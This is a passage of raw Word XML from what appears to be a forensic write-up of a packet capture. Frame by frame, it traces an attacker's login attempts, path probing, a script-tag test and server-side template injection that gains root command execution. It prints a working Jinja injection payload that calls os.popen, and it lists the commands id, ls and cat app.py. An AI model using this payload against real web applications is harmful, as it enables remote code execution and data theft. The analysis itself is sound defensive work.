          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in less than 1 minute</w:t>
      </w:r>
      <w:r w:rsidR="52D20102" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C460C48" w14:textId="1CDD95E6" w:rsidR="52D20102" w:rsidRDefault="52D20102" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CWE-307: Improper Restriction of Excessive Authentication Attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587468C" w14:textId="0C80396E" w:rsidR="69342C27" w:rsidRDefault="69342C27" w:rsidP="1DD92F8E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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Didn’t succeed </w:t>
      </w:r>
      <w:r w:rsidR="6CE48CEE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in logging in</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using this method</w:t>
      </w:r>
      <w:r w:rsidR="090015E1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65113A8B" w14:textId="5CD267EE" w:rsidR="32BD7D81" w:rsidRDefault="32BD7D81" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"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 6620 – 19:15 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2EBD2" w14:textId="49110E0E" w:rsidR="6519680C" w:rsidRDefault="6519680C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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(</w:t>
      </w:r>
      <w:r w:rsidR="06CF1E1B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ame as in frame </w:t>
      </w:r>
      <w:r w:rsidR="4808D9D8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>295</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60F65E" w14:textId="00D022B1" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084484BC" w14:textId="556B3447" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2658B216" w14:textId="6293FB16" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ED55FD" w14:textId="15211591" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355EEDA3" w14:textId="483EB080" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFE93B5" w14:textId="1BDECAA3" w:rsidR="2ABE439F" w:rsidRDefault="2ABE439F" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Frames 6630 to 7158</w:t>
      </w:r>
      <w:r w:rsidR="424F0505" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:16 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF69448" w14:textId="0285DEA3" w:rsidR="424F0505" w:rsidRDefault="424F0505" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Reloads the </w:t>
      </w:r>
      <w:r w:rsidR="1BD03F20" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>main page several times</w:t>
      </w:r>
      <w:r w:rsidR="4E958ABA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (only changing the port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D8848" w14:textId="47C0B96C" w:rsidR="4E958ABA" w:rsidRDefault="4E958ABA" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr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Server behaves well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF9E10" w14:textId="09EAF27F" w:rsidR="6E054939" w:rsidRDefault="6E054939" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Frames 7175 to 7195</w:t>
      </w:r>
      <w:r w:rsidR="19FA9D61" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:16 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AA189" w14:textId="66E3C527" w:rsidR="19FA9D61" w:rsidRDefault="19FA9D61" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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Tries to access </w:t>
      </w:r>
      <w:r w:rsidR="7DF6C6CA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="28255960" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paths (“</w:t>
      </w:r>
      <w:r w:rsidR="34461B05" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/private”, </w:t>
      </w:r>
      <w:r w:rsidR="0393F86D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="02DFD503" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fdssfdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0393F86D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="1A47B701" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and “/test”</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="7CFD70C0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD661A1" w14:textId="218A67B6" w:rsidR="7CFD70C0" w:rsidRDefault="7CFD70C0" w:rsidP="1DD92F8E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>Paths not found, so server redirects to 404.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B978A56" w14:textId="01778AC4" w:rsidR="7CFD70C0" w:rsidRDefault="7CFD70C0" w:rsidP="1DD92F8E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Attacker seems to have </w:t>
      </w:r>
      <w:r w:rsidR="44B0E8D9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>spotted</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a possi</w:t>
      </w:r>
      <w:r w:rsidR="53F2B788" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ble</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="57CCCD9C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that he explores next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814AFA9" w14:textId="687FCC44" w:rsidR="65E2A862" w:rsidRDefault="65E2A862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7205 – 19:17 WET:</w:t>
      </w:r>
      <w:r w:rsidR="4E9555DE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025FE10E" w14:textId="6F2712E6" w:rsidR="2391C0ED" w:rsidRDefault="2391C0ED" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Inserts a script tag in the URL</w:t>
      </w:r>
      <w:r w:rsidR="0C37D8BC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform an alert</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534AA8BC" w14:textId="7DD367F7" w:rsidR="6AC0B765" w:rsidRDefault="6AC0B765" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Succeed and l</w:t>
      </w:r>
      <w:r w:rsidR="55EDAB78" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>earns</w:t>
      </w:r>
      <w:r w:rsidR="54D01959" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the</w:t>
      </w:r>
      <w:r w:rsidR="5E864557" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> server interprets the code written in the </w:t>
      </w:r>
      <w:r w:rsidR="64ECDBBB" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="4F871514" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and prints it</w:t>
      </w:r>
      <w:r w:rsidR="64ECDBBB" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54405F73" w14:textId="338F899F" w:rsidR="1A457A8A" w:rsidRDefault="1A457A8A" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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CWE-94: Improper Control of Generation of Code ('Code Injection').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7134A3" w14:textId="19C04106" w:rsidR="1B3776C6" w:rsidRDefault="1B3776C6" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="210ED659" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ormat of</w:t>
      </w:r>
      <w:r w:rsidR="219E0D2A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="210ED659" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
      <w:r w:rsidR="59DC5BF7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (add to URL)</w:t>
      </w:r>
      <w:r w:rsidR="210ED659" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C015B8" w14:textId="3B1BD372" w:rsidR="210ED659" w:rsidRDefault="210ED659" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>request.application.__globals__.__builtins__.__import__('os')['popen']('</w:t>
      </w:r>
      <w:r w:rsidR="12EF56F3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LINUX_TERMINAL_COMMAND</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967A67F" w14:textId="7BE64B4B" w:rsidR="5A706F00" w:rsidRDefault="5A706F00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 xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r w:rsidR="5747E879" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7215 – 19:17 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEAD54" w14:textId="1CF0160D" w:rsidR="382D2CE3" w:rsidRDefault="382D2CE3" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Injects python code in the URL (a simple 1+1) to see if the serve responds accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25575BF3" w14:textId="115B061C" w:rsidR="382D2CE3" w:rsidRDefault="382D2CE3" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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The server does respond to the injection and prints the result (2) </w:t>
      </w:r>
      <w:r w:rsidR="626D7F53" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in the html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A069834" w14:textId="68F5A612" w:rsidR="626D7F53" w:rsidRDefault="626D7F53" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Now the attacker knows that the webapp is written in python and knows that it allows code injection (CWE-94)</w:t>
      </w:r>
      <w:r w:rsidR="741BDC77" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613051F" w14:textId="15FDEAB0" w:rsidR="741BDC77" w:rsidRDefault="741BDC77" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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From this point, the attacker knows how to attack the VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9614E" w14:textId="19C0045B" w:rsidR="32C0C1A9" w:rsidRDefault="32C0C1A9" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1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7225 to 7274</w:t>
      </w:r>
      <w:r w:rsidR="164096CD" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:17 to 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD195AC" w14:textId="211463CE" w:rsidR="7E32D3A2" w:rsidRDefault="7E32D3A2" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Incrementally learns how to execute a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command from </w:t>
      </w:r>
      <w:r w:rsidR="6D671956" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="230466B7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> web app </w:t>
      </w:r>
      <w:r w:rsidR="751607A1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>using the injection method he just found out</w:t>
      </w:r>
      <w:r w:rsidR="6EAF713D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) and how to print the result</w:t>
      </w:r>
      <w:r w:rsidR="0016AA61" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="0256D950" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>such</w:t>
      </w:r>
      <w:r w:rsidR="0016AA61" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0D698" w14:textId="476DA1CF" w:rsidR="0016AA61" w:rsidRDefault="0016AA61" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Eventually succeeds and </w:t>
      </w:r>
      <w:r w:rsidR="12ED6F2F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>receives the root id (given by the command “id”)</w:t>
      </w:r>
      <w:r w:rsidR="19540593" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFAABA" w14:textId="55C462C8" w:rsidR="19540593" w:rsidRDefault="19540593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7284 – 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A055872" w14:textId="6E944BF3" w:rsidR="53D9E8F5" w:rsidRDefault="53D9E8F5" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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</w:t>
      </w:r>
      <w:r w:rsidR="1C803438" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command “ls” and receives </w:t>
      </w:r>
      <w:r w:rsidR="5123B358" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="1C803438" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>result of such command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23750475" w14:textId="191FE991" w:rsidR="1C803438" w:rsidRDefault="1C803438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7294 – 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18463445" w14:textId="030115B7" w:rsidR="4FF4ACF3" w:rsidRDefault="4FF4ACF3" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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lastRenderedPageBreak/>
        <w:t>Sends</w:t>
      </w:r>
      <w:r w:rsidR="1C803438" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command “cat app.py” </w:t>
      </w:r>
      <w:r w:rsidR="1C803438" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and receives </w:t>
      </w:r>
      <w:r w:rsidR="5A0030CB" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
